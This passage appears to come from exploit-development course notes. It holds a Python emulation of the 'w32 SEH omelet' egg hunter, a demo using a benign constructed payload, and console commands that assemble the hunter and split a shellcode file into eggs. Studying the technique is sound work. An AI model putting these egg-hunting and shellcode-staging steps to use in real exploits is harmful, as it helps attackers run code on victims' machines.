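    to egg_size (REPNE SCASB), the next dword XOR (marker << 8) | 0xFF (LODSD / XOR)
    accepted only if <= max_index (CMP / JA), then egg_size bytes copied to
    basket + egg_size * index (IMUL / REP MOVSB). Stops once all eggs are copied."""
    key = (marker << 8) | 0xFF
    basket = bytearray(egg_size * (max_index + 1))
    found, pos = set(), 0
    while len(found) <= max_index:
        pos = memory.find(bytes([egg_size]), pos)
        if pos < 0 or pos + 1 + 4 > len(memory):
            break
        pos += 1                                   # ESI = EDI: just past the LL byte
        index = struct.unpack_from("<I", memory, pos)[0] ^ key
        if index > max_index:
            continue                               # not a marker, keep scanning here
        data = memory[pos + 4:pos + 4 + egg_size]
        if len(data) < egg_size:
            break                                  # truncated egg at the end of the image
        basket[egg_size * index:egg_size * (index + 1)] = data
        found.add(index)
        pos += 4 + egg_size                        # MOV EDI, ESI: resume after the egg
    if len(found) != max_index + 1:
        raise ValueError("found %d of %d eggs" % (len(found), max_index + 1))
    return bytes(basket)

def demo():
    """Constructed sample: three eggs out of order between filler holding a decoy 0x7A."""
    payload = b"CONSTRUCTED SAMPLE PAYLOAD, NOT SHELLCODE. " * 6   # 258 bytes -> 3 eggs
    eggs = make_eggs(payload)
    filler = b"\x00" * 40 + b"\x7a\x00\x00\x00\x00" + b"\x41" * 30
    memory = filler + eggs[2] + filler + eggs[0] + filler + eggs[1] + filler
    return payload, hunt(memory, len(eggs[0]) - HEADER_LEN, len(eggs) - 1)
```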
custom_w32_SEH_omelet.asm build

C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>"c:\Program Files\nasm\nasm.exe" -f bin -o custom_w32_SEH_omelet.bin custom_w32_SEH_omelet.asm -w+error

C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>w32_SEH_omelet.py custom_w32_SEH_omelet.bin shellcode.bin calceggs_custom.txt 127 0xBADA55
Thank You :)
See you the week after next.